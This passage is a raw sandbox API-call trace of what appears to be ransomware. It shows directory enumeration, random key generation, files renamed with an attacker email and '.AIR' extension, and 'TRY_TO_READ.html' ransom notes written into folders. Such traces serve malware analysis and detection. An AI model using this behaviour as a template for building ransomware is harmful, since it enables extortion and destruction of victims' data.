ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.642] GetLastError () returned 0x6 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3507c8 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dc98 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dc98 | out: hHeap=0x2e0000) returned 1 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507c8 | out: hHeap=0x2e0000) returned 1 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.642] FindNextFileW (in: hFindFile=0x35dc58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.642] GetLastError () returned 0x6 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3507c8 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507c8 | out: hHeap=0x2e0000) returned 1 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.643] FindNextFileW (in: hFindFile=0x35dc58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97053df0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.643] GetLastError () returned 0x6 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.643] FindNextFileW (in: hFindFile=0x35dc58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97053df0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363210 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c28 [0116.643] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363210 | out: pbBuffer=0x363210) returned 1 [0116.643] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c28 | out: pbBuffer=0x330c28) returned 1 [0116.643] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.643] lstrlenW (lpString="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30 [0116.643] GetProcessHeap () returned 0x2e0000 [0116.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.643] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" [0116.643] lstrcatW (in: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.643] MoveFileExW (lpExistingFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.643] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.644] GetProcessHeap () returned 0x2e0000 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.644] CloseHandle (hObject=0xffffffff) returned 0 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34def0 | out: hHeap=0x2e0000) returned 1 [0116.644] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dc98 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.644] GetLastError () returned 0x6 [0116.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e648 [0116.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dcd8 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dcd8 | out: hHeap=0x2e0000) returned 1 [0116.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e648 | out: hHeap=0x2e0000) returned 1 [0116.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.644] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.645] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.645] GetLastError () returned 0x6 [0116.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.645] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e648 [0116.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dcd8 [0116.645] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dcd8 | out: hHeap=0x2e0000) returned 1 [0116.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.645] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.645] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e648 | out: hHeap=0x2e0000) returned 1 [0116.645] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.645] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x970a00b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.645] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.646] GetLastError () returned 0x6 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.646] GetLastError () returned 0x6 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.646] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.646] GetLastError () returned 0x6 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.646] GetLastError () returned 0x6 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e648 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0116.647] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.647] GetLastError () returned 0x6 [0116.647] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.647] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328b50 | out: hHeap=0x2e0000) returned 1 [0116.647] GetLastError () returned 0x6 [0116.647] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.647] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.649] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.649] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.650] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.650] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.650] CloseHandle (hObject=0x458) returned 1 [0116.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ac8 | out: hHeap=0x2e0000) returned 1 [0116.650] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0116.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.650] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.650] GetLastError () returned 0x0 [0116.650] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.651] GetLastError () returned 0x0 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5f8 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0116.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.651] GetLastError () returned 0x0 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328bd8 | out: hHeap=0x2e0000) returned 1 [0116.651] GetLastError () returned 0x0 [0116.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.651] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.653] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.653] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.654] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.654] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.654] CloseHandle (hObject=0x458) returned 1 [0116.654] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328b50 | out: hHeap=0x2e0000) returned 1 [0116.655] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.655] GetLastError () returned 0x0 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.655] GetLastError () returned 0x0 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5a8 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328c60 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.655] GetLastError () returned 0x0 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328c60 | out: hHeap=0x2e0000) returned 1 [0116.655] GetLastError () returned 0x0 [0116.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.655] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.658] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.658] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, 